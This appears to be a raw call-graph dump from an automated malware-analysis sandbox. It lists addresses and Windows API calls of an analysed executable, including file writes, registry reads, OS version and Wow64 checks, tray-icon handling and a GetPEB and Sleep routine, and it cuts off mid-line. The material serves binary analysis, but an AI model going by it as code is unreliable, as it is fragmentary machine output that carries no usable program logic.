102465->102466 102466->102462 102467 648a05 74 API calls 102466->102467 102469 648ae0 102467->102469 102468 648a05 74 API calls 102468->102469 102469->102462 102469->102468 102471 648e21 102470->102471 102473 648e61 102470->102473 102471->102437 102473->102471 102482 648ee8 102473->102482 102475 648f42 102474->102475 102477 648f53 102474->102477 102476 604863 80 API calls 102475->102476 102476->102477 102477->102434 102481 648a18 102478->102481 102479 648a98 102479->102462 102479->102463 102480 648e9f 74 API calls 102480->102481 102481->102479 102481->102480 102483 648f14 102482->102483 102484 648f25 102482->102484 102486 604863 102483->102486 102484->102473 102487 60486f __write 102486->102487 102488 6048a5 102487->102488 102489 60488d 102487->102489 102490 60489d __write 102487->102490 102491 606c11 __lock_file 59 API calls 102488->102491 102511 608b28 58 API calls __getptd_noexit 102489->102511 102490->102484 102493 6048ab 102491->102493 102499 60470a 102493->102499 102494 604892 102512 608db6 9 API calls __write 102494->102512 102501 604719 102499->102501 102506 604737 102499->102506 102500 604727 102502 608b28 __write 58 API calls 102500->102502 102501->102500 102501->102506 102509 604751 _memmove 102501->102509 102503 60472c 102502->102503 102504 608db6 __write 9 API calls 102503->102504 102504->102506 102505 60ae1e __flsbuf 78 API calls 102505->102509 102513 6048dd LeaveCriticalSection LeaveCriticalSection __wfsopen 102506->102513 102507 604a3d __flush 78 API calls 102507->102509 102508 6046e6 __fflush_nolock 58 API calls 102508->102509 102509->102505 102509->102506 102509->102507 102509->102508 102510 60d886 __write 78 API calls 102509->102510 102510->102509 102511->102494 102512->102490 102513->102490 102515 605349 102514->102515 102516 60535d 102514->102516 102569 608b28 58 API calls __getptd_noexit 102515->102569 102528 605359 102516->102528 102533 604a3d 102516->102533 102518 60534e 102570 608db6 9 API calls __write 102518->102570 102524 6046e6 __fflush_nolock 58 API calls 102525 605377 102524->102525 102543 610a02 102525->102543 102527 60537d 102527->102528 102529 602d55 _free 58 API calls 102527->102529 102532 605415 LeaveCriticalSection LeaveCriticalSection __wfsopen 102528->102532 102529->102528 102530->102452 102531->102455 102532->102455 102534 604a50 102533->102534 102538 604a74 102533->102538 102535 6046e6 __fflush_nolock 58 API calls 102534->102535 102534->102538 102536 604a6d 102535->102536 102571 60d886 102536->102571 102539 610b77 102538->102539 102540 610b84 102539->102540 102542 605371 102539->102542 102541 602d55 _free 58 API calls 102540->102541 102540->102542 102541->102542 102542->102524 102544 610a0e __write 102543->102544 102545 610a32 102544->102545 102546 610a1b 102544->102546 102548 610abd 102545->102548 102550 610a42 102545->102550 102696 608af4 58 API calls __getptd_noexit 102546->102696 102701 608af4 58 API calls __getptd_noexit 102548->102701 102549 610a20 102697 608b28 58 API calls __getptd_noexit 102549->102697 102553 610a60 102550->102553 102554 610a6a 102550->102554 102698 608af4 58 API calls __getptd_noexit 102553->102698 102557 60d206 ___lock_fhandle 59 API calls 102554->102557 102555 610a65 102702 608b28 58 API calls __getptd_noexit 102555->102702 102559 610a70 102557->102559 102560 610a83 102559->102560 102561 610a8e 102559->102561 102681 610add 102560->102681 102699 608b28 58 API calls __getptd_noexit 102561->102699 102562 610ac9 102703 608db6 9 API calls __write 102562->102703 102564 610a27 __write 102564->102527 102567 610a89 102700 610ab5 LeaveCriticalSection __unlock_fhandle 102567->102700 102569->102518 102570->102528 102572 60d892 __write 102571->102572 102573 60d8b6 102572->102573 102574 60d89f 102572->102574 102576 60d955 102573->102576 102578 60d8ca 102573->102578 102672 608af4 58 API calls __getptd_noexit 102574->102672 102678 608af4 58 API calls __getptd_noexit 102576->102678 102577 60d8a4 102673 608b28 58 API calls __getptd_noexit 102577->102673 102581 60d8f2 102578->102581 102582 60d8e8 102578->102582 102599 60d206 102581->102599 102674 608af4 58 API calls __getptd_noexit 102582->102674 102583 60d8ed 102679 608b28 58 API calls __getptd_noexit 102583->102679 102586 60d8f8 102588 60d90b 102586->102588 102589 60d91e 102586->102589 102608 60d975 102588->102608 102675 608b28 58 API calls __getptd_noexit 102589->102675 102590 60d961 102680 608db6 9 API calls __write 102590->102680 102591 60d8ab __write 102591->102538 102595 60d917 102677 60d94d LeaveCriticalSection __unlock_fhandle 102595->102677 102596 60d923 102676 608af4 58 API calls __getptd_noexit 102596->102676 102600 60d212 __write 102599->102600 102601 60d261 EnterCriticalSection 102600->102601 102602 609c0b __lock 58 API calls 102600->102602 102603 60d287 __write 102601->102603 102604 60d237 102602->102604 102603->102586 102605 60d24f 102604->102605 102606 609e2b __mtinitlocks InitializeCriticalSectionAndSpinCount 102604->102606 102607 60d28b ___lock_fhandle LeaveCriticalSection 102605->102607 102606->102605 102607->102601 102609 60d982 __ftell_nolock 102608->102609 102610 60d9e0 102609->102610 102611 60d9c1 102609->102611 102642 60d9b6 102609->102642 102616 60da38 102610->102616 102617 60da1c 102610->102617 102613 608af4 __write 58 API calls 102611->102613 102612 60c5f6 __ld12tod 6 API calls 102614 60e1d6 102612->102614 102615 60d9c6 102613->102615 102614->102595 102618 608b28 __write 58 API calls 102615->102618 102619 60da51 102616->102619 102623 6118c1 __lseeki64_nolock 60 API calls 102616->102623 102620 608af4 __write 58 API calls 102617->102620 102622 60d9cd 102618->102622 102624 615c6b __flsbuf 58 API calls 102619->102624 102621 60da21 102620->102621 102625 608b28 __write 58 API calls 102621->102625 102626 608db6 __write 9 API calls 102622->102626 102623->102619 102627 60da5f 102624->102627 102628 60da28 102625->102628 102626->102642 102629 60ddb8 102627->102629 102635 6099ac _wcstok 58 API calls 102627->102635 102632 608db6 __write 9 API calls 102628->102632 102630 60ddd6 102629->102630 102631 60e14b WriteFile 102629->102631 102633 60defa 102630->102633 102640 60ddec 102630->102640 102634 60ddab GetLastError 102631->102634 102644 60dd78 102631->102644 102632->102642 102645 60dfef 102633->102645 102647 60df05 102633->102647 102634->102644 102636 60da8b GetConsoleMode 102635->102636 102636->102629 102638 60daca 102636->102638 102637 60e184 102637->102642 102643 608b28 __write 58 API calls 102637->102643 102638->102629 102639 60dada GetConsoleCP 102638->102639 102639->102637 102668 60db09 102639->102668 102640->102637 102641 60de5b WriteFile 102640->102641 102641->102634 102646 60de98 102641->102646 102642->102612 102648 60e1b2 102643->102648 102644->102637 102644->102642 102649 60ded8 102644->102649 102645->102637 102650 60e064 WideCharToMultiByte 102645->102650 102646->102640 102651 60debc 102646->102651 102647->102637 102652 60df6a WriteFile 102647->102652 102653 608af4 __write 58 API calls 102648->102653 102654 60dee3 102649->102654 102655 60e17b 102649->102655 102650->102634 102666 60e0ab 102650->102666 102651->102644 102652->102634 102658 60dfb9 102652->102658 102653->102642 102656 608b28 __write 58 API calls 102654->102656 102657 608b07 __dosmaperr 58 API calls 102655->102657 102659 60dee8 102656->102659 102657->102642 102658->102644 102658->102647 102658->102651 102661 608af4 __write 58 API calls 102659->102661 102660 60e0b3 WriteFile 102663 60e106 GetLastError 102660->102663 102660->102666 102661->102642 102662 6035f5 __write_nolock 58 API calls 102662->102668 102663->102666 102664 60dc5f 102664->102634 102664->102644 102667 617a5e WriteConsoleW CreateFileW __putwch_nolock 102664->102667 102664->102668 102671 60dc87 WriteFile 102664->102671 102665 6162ba 60 API calls __write_nolock 102665->102668 102666->102644 102666->102645 102666->102651 102666->102660 102667->102664 102668->102644 102668->102662 102668->102664 102668->102665 102669 60dbf2 WideCharToMultiByte 102668->102669 102669->102644 102670 60dc2d WriteFile 102669->102670 102670->102634 102670->102664 102671->102634 102671->102664 102672->102577 102673->102591 102674->102583 102675->102596 102676->102595 102677->102591 102678->102583 102679->102590 102680->102591 102704 60d4c3 102681->102704 102683 610b41 102717 60d43d 59 API calls __write 102683->102717 102685 610aeb 102685->102683 102686 610b1f 102685->102686 102688 60d4c3 __lseeki64_nolock 58 API calls 102685->102688 102686->102683 102689 60d4c3 __lseeki64_nolock 58 API calls 102686->102689 102687 610b49 102690 610b6b 102687->102690 102718 608b07 58 API calls 2 library calls 102687->102718 102691 610b16 102688->102691 102692 610b2b CloseHandle 102689->102692 102690->102567 102695 60d4c3 __lseeki64_nolock 58 API calls 102691->102695 102692->102683 102693 610b37 GetLastError 102692->102693 102693->102683 102695->102686 102696->102549 102697->102564 102698->102555 102699->102567 102700->102564 102701->102555 102702->102562 102703->102564 102705 60d4e3 102704->102705 102706 60d4ce 102704->102706 102708 608af4 __write 58 API calls 102705->102708 102712 60d508 102705->102712 102707 608af4 __write 58 API calls 102706->102707 102709 60d4d3 102707->102709 102710 60d512 102708->102710 102711 608b28 __write 58 API calls 102709->102711 102713 608b28 __write 58 API calls 102710->102713 102714 60d4db 102711->102714 102712->102685 102715 60d51a 102713->102715 102714->102685 102716 608db6 __write 9 API calls 102715->102716 102716->102714 102717->102687 102718->102690 102720 60079e __ftell_nolock 102719->102720 102721 60079f GetLongPathNameW 102720->102721 102722 5e7bcc 59 API calls 102721->102722 102723 5e72bd 102722->102723 102724 5e700b 102723->102724 102725 5e7667 59 API calls 102724->102725 102726 5e701d 102725->102726 102727 5e4750 60 API calls 102726->102727 102728 5e7028 102727->102728 102729 5e7033 102728->102729 102732 61e885 102728->102732 102731 5e3f74 59 API calls 102729->102731 102733 5e703f 102731->102733 102734 61e89f 102732->102734 102777 5e7908 61 API calls 102732->102777 102771 5e34c2 102733->102771 102736 5e7052 Mailbox 102736->101617 102738 5e4ddd 136 API calls 102737->102738 102739 5e688f 102738->102739 102740 61e031 102739->102740 102742 5e4ddd 136 API calls 102739->102742 102741 64955b 122 API calls 102740->102741 102743 61e046 102741->102743 102744 5e68a3 102742->102744 102745 61e067 102743->102745 102746 61e04a 102743->102746 102744->102740 102747 5e68ab 102744->102747 102749 600db6 Mailbox 59 API calls 102745->102749 102748 5e4e4a 84 API calls 102746->102748 102750 61e052 102747->102750 102751 5e68b7 102747->102751 102748->102750 102770 61e0ac Mailbox 102749->102770 102871 6442f8 90 API calls _wprintf 102750->102871 102778 5e6a8c 102751->102778 102755 61e060 102755->102745 102756 61e260 102757 602d55 _free 58 API calls 102756->102757 102758 61e268 102757->102758 102759 5e4e4a 84 API calls 102758->102759 102764 61e271 102759->102764 102763 602d55 _free 58 API calls 102763->102764 102764->102763 102765 5e4e4a 84 API calls 102764->102765 102877 63f7a1 89 API calls 4 library calls 102764->102877 102765->102764 102767 5e7de1 59 API calls 102767->102770 102770->102756 102770->102764 102770->102767 102872 63f73d 59 API calls 2 library calls 102770->102872 102873 63f65e 61 API calls 2 library calls 102770->102873 102874 64737f 59 API calls Mailbox 102770->102874 102875 5e750f 59 API calls 2 library calls 102770->102875 102876 5e735d 59 API calls Mailbox 102770->102876 102773 5e34d4 102771->102773 102776 5e34f3 _memmove 102771->102776 102772 600db6 Mailbox 59 API calls 102774 5e350a 102772->102774 102775 600db6 Mailbox 59 API calls 102773->102775 102774->102736 102775->102776 102776->102772 102777->102732 102779 5e6ab5 102778->102779 102780 61e41e 102778->102780 102883 5e57a6 60 API calls Mailbox 102779->102883 102950 63f7a1 89 API calls 4 library calls 102780->102950 102783 5e6ad7 102884 5e57f6 67 API calls 102783->102884 102784 61e431 102951 63f7a1 89 API calls 4 library calls 102784->102951 102786 5e6aec 102786->102784 102787 5e6af4 102786->102787 102789 5e7667 59 API calls 102787->102789 102791 5e6b00 102789->102791 102790 61e44d 102793 5e6b61 102790->102793 102885 600957 60 API calls __ftell_nolock 102791->102885 102794 5e6b6f 102793->102794 102795 61e460 102793->102795 102798 5e7667 59 API calls 102794->102798 102797 5e5c6f CloseHandle 102795->102797 102796 5e6b0c 102799 5e7667 59 API calls 102796->102799 102800 61e46c 102797->102800 102801 5e6b78 102798->102801 102802 5e6b18 102799->102802 102803 5e4ddd 136 API calls 102800->102803 102804 5e7667 59 API calls 102801->102804 102805 5e4750 60 API calls 102802->102805 102806 61e488 102803->102806 102807 5e6b81 102804->102807 102808 5e6b26 102805->102808 102809 61e4b1 102806->102809 102813 64955b 122 API calls 102806->102813 102888 5e459b 102807->102888 102886 5e5850 ReadFile SetFilePointerEx 102808->102886 102952 63f7a1 89 API calls 4 library calls 102809->102952 102812 5e6b52 102887 5e5aee SetFilePointerEx SetFilePointerEx 102812->102887 102817 61e4a4 102813->102817 102814 5e6b98 102818 5e7b2e 59 API calls 102814->102818 102820 61e4cd 102817->102820 102821 61e4ac 102817->102821 102822 5e6ba9 SetCurrentDirectoryW 102818->102822 102819 61e4c8 102848 5e6d0c Mailbox 102819->102848 102824 5e4e4a 84 API calls 102820->102824 102823 5e4e4a 84 API calls 102821->102823 102827 5e6bbc Mailbox 102822->102827 102823->102809 102825 61e4d2 102824->102825 102826 600db6 Mailbox 59 API calls 102825->102826 102833 61e506 102826->102833 102828 600db6 Mailbox 59 API calls 102827->102828 102831 5e6bcf 102828->102831 102830 5e3bbb 102830->101476 102830->101485 102832 5e522e 59 API calls 102831->102832 102859 5e6bda Mailbox __NMSG_WRITE 102832->102859 102953 5e750f 59 API calls 2 library calls 102833->102953 102835 5e6ce7 102838 61e740 102959 6472df 59 API calls Mailbox 102838->102959 102842 61e762 102960 65fbce 59 API calls 2 library calls 102842->102960 102845 61e76f 102847 602d55 _free 58 API calls 102845->102847 102846 61e7d9 102847->102848 102878 5e57d4 102848->102878 102853 61e54f Mailbox 102853->102838 102862 5e7de1 59 API calls 102853->102862 102866 61e792 102853->102866 102954 63f73d 59 API calls 2 library calls 102853->102954 102955 63f65e 61 API calls 2 library calls 102853->102955 102956 64737f 59 API calls Mailbox 102853->102956 102957 5e750f 59 API calls 2 library calls 102853->102957 102958 5e7213 59 API calls Mailbox 102853->102958 102855 61e7d1 102857 5e7de1 59 API calls 102857->102859 102859->102835 102859->102846 102859->102855 102859->102857 102939 5e586d 67 API calls _wcscpy 102859->102939 102940 5e6f5d GetStringTypeW 102859->102940 102941 5e6ecc 60 API calls __wcsnicmp 102859->102941 102942 5e6faa GetStringTypeW __NMSG_WRITE 102859->102942 102943 60363d GetStringTypeW _iswctype 102859->102943 102944 5e68dc 165 API calls 3 library calls 102859->102944 102945 5e7213 59 API calls Mailbox 102859->102945 102862->102853 102961 63f7a1 89 API calls 4 library calls 102866->102961 102868 61e7ab 102869 602d55 _free 58 API calls 102868->102869 102870 61e7be 102869->102870 102870->102848 102871->102755 102872->102770 102873->102770 102874->102770 102875->102770 102876->102770 102877->102764 102879 5e5c6f CloseHandle 102878->102879 102880 5e57dc Mailbox 102879->102880 102881 5e5c6f CloseHandle 102880->102881 102882 5e57eb 102881->102882 102882->102830 102883->102783 102884->102786 102885->102796 102886->102812 102887->102793 102889 5e7667 59 API calls 102888->102889 102890 5e45b1 102889->102890 102891 5e7667 59 API calls 102890->102891 102892 5e45b9 102891->102892 102893 5e7667 59 API calls 102892->102893 102894 5e45c1 102893->102894 102895 5e7667 59 API calls 102894->102895 102896 5e45c9 102895->102896 102897 61d4d2 102896->102897 102898 5e45fd 102896->102898 102899 5e8047 59 API calls 102897->102899 102900 5e784b 59 API calls 102898->102900 102901 61d4db 102899->102901 102902 5e460b 102900->102902 102903 5e7d8c 59 API calls 102901->102903 102904 5e7d2c 59 API calls 102902->102904 102907 5e4640 102903->102907 102905 5e4615 102904->102905 102905->102907 102908 5e784b 59 API calls 102905->102908 102906 5e4680 102964 5e784b 102906->102964 102907->102906 102910 5e465f 102907->102910 102920 61d4fb 102907->102920 102911 5e4636 102908->102911 102912 5e79f2 59 API calls 102910->102912 102915 5e7d2c 59 API calls 102911->102915 102917 5e4669 102912->102917 102913 5e4691 102918 5e46a3 102913->102918 102921 5e8047 59 API calls 102913->102921 102914 61d5cb 102916 5e7bcc 59 API calls 102914->102916 102915->102907 102934 61d588 102916->102934 102917->102906 102925 5e784b 59 API calls 102917->102925 102919 5e46b3 102918->102919 102922 5e8047 59 API calls 102918->102922 102924 5e46ba 102919->102924 102926 5e8047 59 API calls 102919->102926 102920->102914 102923 61d5b4 102920->102923 102933 61d532 102920->102933 102921->102918 102922->102919 102923->102914 102929 61d59f 102923->102929 102927 5e8047 59 API calls 102924->102927 102936 5e46c1 Mailbox 102924->102936 102925->102906 102926->102924 102927->102936 102928 5e79f2 59 API calls 102928->102934 102932 5e7bcc 59 API calls 102929->102932 102930 61d590 102931 5e7bcc 59 API calls 102930->102931 102931->102934 102932->102934 102933->102930 102937 61d57b 102933->102937 102934->102906 102934->102928 102977 5e7924 59 API calls 2 library calls 102934->102977 102936->102814 102938 5e7bcc 59 API calls 102937->102938 102938->102934 102939->102859 102940->102859 102941->102859 102942->102859 102943->102859 102944->102859 102945->102859 102950->102784 102951->102790 102952->102819 102953->102853 102954->102853 102955->102853 102956->102853 102957->102853 102958->102853 102959->102842 102960->102845 102961->102868 102965 5e785a 102964->102965 102966 5e78b7 102964->102966 102965->102966 102968 5e7865 102965->102968 102967 5e7d2c 59 API calls 102966->102967 102974 5e7888 _memmove 102967->102974 102969 61eb09 102968->102969 102970 5e7880 102968->102970 102971 5e8029 59 API calls 102969->102971 102978 5e7f27 59 API calls Mailbox 102970->102978 102973 61eb13 102971->102973 102975 600db6 Mailbox 59 API calls 102973->102975 102974->102913 102976 61eb33 102975->102976 102977->102934 102978->102974 102980 5e6d95 102979->102980 102984 5e6ea9 102979->102984 102981 600db6 Mailbox 59 API calls 102980->102981 102980->102984 102983 5e6dbc 102981->102983 102982 600db6 Mailbox 59 API calls 102985 5e6e31 102982->102985 102983->102982 102984->101623 102985->102984 102992 5e6240 102985->102992 103017 5e735d 59 API calls Mailbox 102985->103017 103018 636553 59 API calls Mailbox 102985->103018 103019 5e750f 59 API calls 2 library calls 102985->103019 102990->101625 102991->101627 103020 5e7a16 102992->103020 102994 5e646a 103027 5e750f 59 API calls 2 library calls 102994->103027 102996 5e6484 Mailbox 102996->102985 102997 5e6265 102997->102994 103000 61dff6 102997->103000 103002 5e6799 _memmove 102997->103002 103004 5e750f 59 API calls 102997->103004 103006 5e7d8c 59 API calls 102997->103006 103010 61df92 102997->103010 103014 5e7e4f 59 API calls 102997->103014 103025 5e5f6c 60 API calls 102997->103025 103026 5e5d41 59 API calls Mailbox 102997->103026 103028 5e5e72 60 API calls 102997->103028 103029 5e7924 59 API calls 2 library calls 102997->103029 103030 63f8aa 91 API calls 4 library calls 103000->103030 103032 63f8aa 91 API calls 4 library calls 103002->103032 103004->102997 103006->102997 103007 61e004 103031 5e750f 59 API calls 2 library calls 103007->103031 103011 5e8029 59 API calls 103010->103011 103013 61df9d 103011->103013 103016 600db6 Mailbox 59 API calls 103013->103016 103015 5e643b CharUpperBuffW 103014->103015 103015->102997 103016->103002 103017->102985 103018->102985 103019->102985 103021 600db6 Mailbox 59 API calls 103020->103021 103022 5e7a3b 103021->103022 103023 5e8029 59 API calls 103022->103023 103024 5e7a4a 103023->103024 103024->102997 103025->102997 103026->102997 103027->102996 103028->102997 103029->102997 103030->103007 103032->102996 103033->101641 103034->101642 103036 61d423 103035->103036 103037 5e4196 103035->103037 103036->103037 103038 61d42c DestroyIcon 103036->103038 103037->101648 103061 642f94 62 API calls _W_store_winword 103037->103061 103038->103037 103061->101648 103063 5ee6d5 103062->103063 103094 5ef4ba 103093->103094 103095 5ef650 103093->103095 103113 5e3212 103112->103113 103114 5e31e0 103112->103114 103113->101721 103114->103113 103117->101721 103570 5e8180 103118->103570 103200->101721 103201->101670 103202->101670 103203->101670 103204->101721 103205->101721 103206->101721 103208 5e9851 103207->103208 103217 5e984b 103207->103217 103217->101721 103225->101721 103226->101721 103228 61eda1 103227->103228 103231 5e82f2 103227->103231 103238->101717 103239->101717 103240->101717 103241->101717 103242->101717 103243->101717 103244->101717 103623 61fe27 103636 5ff944 103623->103636 103625 61fe3d 103626 61fe53 103625->103626 103627 61febe 103625->103627 103645 5e9e5d 60 API calls 103626->103645 103632 5efce0 331 API calls 103627->103632 103629 61fe92 103630 61fe9a 103629->103630 103631 62089c 103629->103631 103646 64834f 59 API calls Mailbox 103630->103646 103647 649e4a 89 API calls 4 library calls 103631->103647 103635 61feb2 Mailbox 103632->103635 103635->103635 103637 5ff962 103636->103637 103638 5ff950 103636->103638 103640 5ff968 103637->103640 103641 5ff991 103637->103641 103639 5e9d3c 60 API calls 103638->103639 103644 5ff95a 103639->103644 103643 600db6 Mailbox 59 API calls 103640->103643 103642 5e9d3c 60 API calls 103641->103642 103642->103644 103643->103644 103644->103625 103645->103629 103646->103635 103647->103635 103648 5ebe19 103649 5ec36a 103648->103649 103650 5ebe22 103648->103650 103658 5eba8b Mailbox 103649->103658 103663 637bdb 59 API calls _memmove 103649->103663 103650->103649 103651 5e9837 84 API calls 103650->103651 103652 5ebe4d 103651->103652 103652->103649 103654 5ebe5d 103652->103654 103656 5e7a51 59 API calls 103654->103656 103655 621085 103657 5e8047 59 API calls 103655->103657 103656->103658 103657->103658 103659 621361 103658->103659 103660 5ebaab 103658->103660 103665 5e8cd4 59 API calls Mailbox 103658->103665 103659->103660 103664 603d46 59 API calls __wtof_l 103659->103664 103663->103655 103664->103660 103665->103658 103666 5e1066 103671 5ef76f 103666->103671 103668 5e106c 103669 602d40 __cinit 67 API calls 103668->103669 103670 5e1076 103669->103670 103672 5ef790 103671->103672 103704 5fff03 103672->103704 103676 5ef7d7 103677 5e7667 59 API calls 103676->103677 103678 5ef7e1 103677->103678 103679 5e7667 59 API calls 103678->103679 103680 5ef7eb 103679->103680 103681 5e7667 59 API calls 103680->103681 103682 5ef7f5 103681->103682 103683 5e7667 59 API calls 103682->103683 103684 5ef833 103683->103684 103685 5e7667 59 API calls 103684->103685 103686 5ef8fe 103685->103686 103714 5f5f87 103686->103714 103690 5ef930 103691 5e7667 59 API calls 103690->103691 103692 5ef93a 103691->103692 103742 5ffd9e 103692->103742 103694 5ef981 103695 5ef991 GetStdHandle 103694->103695 103696 5ef9dd 103695->103696 103697 6245ab 103695->103697 103699 5ef9e5 OleInitialize 103696->103699 103697->103696 103698 6245b4 103697->103698 103749 646b38 64 API calls Mailbox 103698->103749 103699->103668 103701 6245bb 103750 647207 CreateThread 103701->103750 103703 6245c7 CloseHandle 103703->103699 103751 5fffdc 103704->103751 103707 5fffdc 59 API calls 103708 5fff45 103707->103708 103709 5e7667 59 API calls 103708->103709 103710 5fff51 103709->103710 103711 5e7bcc 59 API calls 103710->103711 103712 5ef796 103711->103712 103713 600162 6 API calls 103712->103713 103713->103676 103715 5e7667 59 API calls 103714->103715 103716 5f5f97 103715->103716 103717 5e7667 59 API calls 103716->103717 103718 5f5f9f 103717->103718 103758 5f5a9d 103718->103758 103721 5f5a9d 59 API calls 103722 5f5faf 103721->103722 103723 5e7667 59 API calls 103722->103723 103724 5f5fba 103723->103724 103725 600db6 Mailbox 59 API calls 103724->103725 103726 5ef908 103725->103726 103727 5f60f9 103726->103727 103728 5f6107 103727->103728 103729 5e7667 59 API calls 103728->103729 103730 5f6112 103729->103730 103731 5e7667 59 API calls 103730->103731 103732 5f611d 103731->103732 103733 5e7667 59 API calls 103732->103733 103734 5f6128 103733->103734 103735 5e7667 59 API calls 103734->103735 103736 5f6133 103735->103736 103737 5f5a9d 59 API calls 103736->103737 103738 5f613e 103737->103738 103739 600db6 Mailbox 59 API calls 103738->103739 103740 5f6145 RegisterWindowMessageW 103739->103740 103740->103690 103743 5ffdae 103742->103743 103744 63576f 103742->103744 103745 600db6 Mailbox 59 API calls 103743->103745 103761 649ae7 60 API calls 103744->103761 103748 5ffdb6 103745->103748 103747 63577a 103748->103694 103749->103701 103750->103703 103762 6471ed 65 API calls 103750->103762 103752 5e7667 59 API calls 103751->103752 103753 5fffe7 103752->103753 103754 5e7667 59 API calls 103753->103754 103755 5fffef 103754->103755 103756 5e7667 59 API calls 103755->103756 103757 5fff3b 103756->103757 103757->103707 103759 5e7667 59 API calls 103758->103759 103760 5f5aa5 103759->103760 103760->103721 103761->103747 103763 5e1016 103768 5e4974 103763->103768 103766 602d40 __cinit 67 API calls 103767 5e1025 103766->103767 103769 600db6 Mailbox 59 API calls 103768->103769 103770 5e497c 103769->103770 103771 5e101b 103770->103771 103775 5e4936 103770->103775 103771->103766 103776 5e493f 103775->103776 103777 5e4951 103775->103777 103778 602d40 __cinit 67 API calls 103776->103778 103779 5e49a0 103777->103779 103778->103777 103780 5e7667 59 API calls 103779->103780 103781 5e49b8 GetVersionExW 103780->103781 103782 5e7bcc 59 API calls 103781->103782 103783 5e49fb 103782->103783 103784 5e7d2c 59 API calls 103783->103784 103787 5e4a28 103783->103787 103785 5e4a1c 103784->103785 103786 5e7726 59 API calls 103785->103786 103786->103787 103788 5e4a93 GetCurrentProcess IsWow64Process 103787->103788 103790 61d864 103787->103790 103789 5e4aac 103788->103789 103791 5e4b2b GetSystemInfo 103789->103791 103792 5e4ac2 103789->103792 103793 5e4af8 103791->103793 103803 5e4b37 103792->103803 103793->103771 103796 5e4b1f GetSystemInfo 103798 5e4ae9 103796->103798 103797 5e4ad4 103799 5e4b37 2 API calls 103797->103799 103798->103793 103800 5e4aef FreeLibrary 103798->103800 103801 5e4adc GetNativeSystemInfo 103799->103801 103800->103793 103801->103798 103804 5e4ad0 103803->103804 103805 5e4b40 LoadLibraryA 103803->103805 103804->103796 103804->103797 103805->103804 103806 5e4b51 GetProcAddress 103805->103806 103806->103804 103807 e9b7b0 103821 e99400 103807->103821 103809 e9b86c 103824 e9b6a0 103809->103824 103827 e9c890 GetPEB 103821->103827 103823 e99a8b 103823->103809 103825 e9b6a9 Sleep 103824->103825 103826 e9b6b7 103825->103826 103828 e9c8ba 103827->103828 103828->103823 103829 5e1055 103834 5e2649 103829->103834 103832 602d40 __cinit 67 API calls 103833 5e1064 103832->103833 103835 5e7667 59 API calls 103834->103835 103836 5e26b7 103835->103836 103841 5e3582 103836->103841 103839 5e2754 103840 5e105a 103839->103840 103844 5e3416 59 API calls 2 library calls 103839->103844 103840->103832 103845 5e35b0 103841->103845 103844->103839 103846 5e35a1 103845->103846 103847 5e35bd 103845->103847 103846->103839 103847->103846 103848 5e35c4 RegOpenKeyExW 103847->103848 103848->103846 103849 5e35de RegQueryValueExW 103848->103849 103850 5e35ff 103849->103850 103851 5e3614 RegCloseKey 103849->103851 103850->103851 103851->103846 103852 5e3633 103853 5e366a 103852->103853 103854 5e3688 103853->103854 103855 5e36e7 103853->103855 103856 5e36e5 103853->103856 103857 5e374b PostQuitMessage 103854->103857 103858 5e3695 103854->103858 103860 5e36ed 103855->103860 103861 61d0cc 103855->103861 103859 5e36ca DefWindowProcW 103856->103859 103865 5e36d8 103857->103865 103863 61d154 103858->103863 103864 5e36a0 103858->103864 103859->103865 103866 5e3715 SetTimer RegisterWindowMessageW 103860->103866 103867 5e36f2 103860->103867 103907 5f1070 10 API calls Mailbox 103861->103907 103912 642527 71 API calls _memset 103863->103912 103871 5e36a8 103864->103871 103872 5e3755 103864->103872 103866->103865 103873 5e373e CreatePopupMenu 103866->103873 103868 5e36f9 KillTimer 103867->103868 103869 61d06f 103867->103869 103904 5e443a Shell_NotifyIconW _memset 103868->103904 103881 61d074 103869->103881 103882 61d0a8 MoveWindow 103869->103882 103870 61d0f3 103908 5f1093 331 API calls Mailbox 103870->103908 103877 61d139 103871->103877 103878 5e36b3 103871->103878 103897 5e44a0 103872->103897 103873->103865 103877->103859 103911 637c36 59 API calls Mailbox 103877->103911 103884 5e36be 103878->103884 103885 61d124 103878->103885 103879 61d166 103879->103859 103879->103865 103886 61d097 SetFocus 103881->103886 103887 61d078 103881->103887 103882->103865 103883 5e370c 103905 5e3114 DeleteObject DestroyWindow Mailbox 103883->103905 103884->103859 103909 5e443a Shell_NotifyIconW _memset 103884->103909 103910 642d36 81 API calls _memset 103885->103910 103886->103865 103887->103884 103891 61d081 103887->103891 103906 5f1070 10 API calls Mailbox 103891->103906 103892 61d134 103892->103865 103895 61d118 103896 5e434a 68 API calls 103895->103896 103896->103856 103898 5e4539 103897->103898 103899 5e44b7 _memset 103897->103899 103898->103865 103900 5e407c 61 API calls 103899->103900 103903 5e44de 103900->103903 103901 5e4522 KillTimer SetTimer 103901->103898 103902 61d4ab Shell_NotifyIconW 103902->103901 103903->103901 103903->103902 103904->103883 103905->103865 103906->103865 103907->103870 103908->103884 103909->103895 103910->103892 103911->103856 103912->103879 103913 62416f 103917 635fe6 103913->103917 103915 62417a 103916 635fe6 85 API calls 103915->103916 103916->103915 103921 635ff3 103917->103921 103927 636020 103917->103927 103918 636022 103929 5e9328 84 API calls Mailbox 103918->103929 103919 636027 103922 5e9837 84 API calls 103919->103922 103921->103918 103921->103919 103925 63601a 103921->103925 103921->103927 103923 63602e 103922->103923 103924 5e7b2e 59 API calls 103923->103924 103924->103927 103928 5e95a0 59 API calls _wcsstr 103925->103928 103927->103915 103928->103927 103929->103919 103930 61fdfc 103953 5eab30 Mailbox _memmove 103930->103953 103932 63617e Mailbox 59 API calls 103955 5ea057 103932->103955 103933 5e9c90 Mailbox 59 API calls 103933->103953 103934 5eb525 104030 649e4a 89 API calls 4 library calls 103934->104030 103937 600db6 59 API calls Mailbox 103957 5e9f37 Mailbox 103937->103957 103938 6209e5 104034 649e4a 89 API calls 4 library calls 103938->104034 103939 620055 104029 649e4a 89 API calls 4 library calls 103939->104029 103941 5eb900 60 API calls 103941->103957 103942 5eb475 103948 5e8047 59 API calls 103942->103948 103944 5ea55a 104032 649e4a 89 API calls 4 library calls 103944->104032 103945 620064 103948->103955 103949 5eb47a 103949->103938 103949->103939 103951 5e7667 59 API calls 103951->103957 103952 5e8047 59 API calls 103952->103957 103953->103933 103953->103934 103953->103955 103956 5e7de1 59 API calls 103953->103956 103953->103957 103961 65bc6b 331 API calls 103953->103961 103963 600db6 59 API calls Mailbox 103953->103963 103964 5eb2b6 103953->103964 103965 5e9ea0 331 API calls 103953->103965 103967 62086a 103953->103967 103969 620878 103953->103969 103971 62085c 103953->103971 103972 5eb21c 103953->103972 103975 636e8f 59 API calls 103953->103975 103979 65df37 103953->103979 103982 65df23 103953->103982 103985 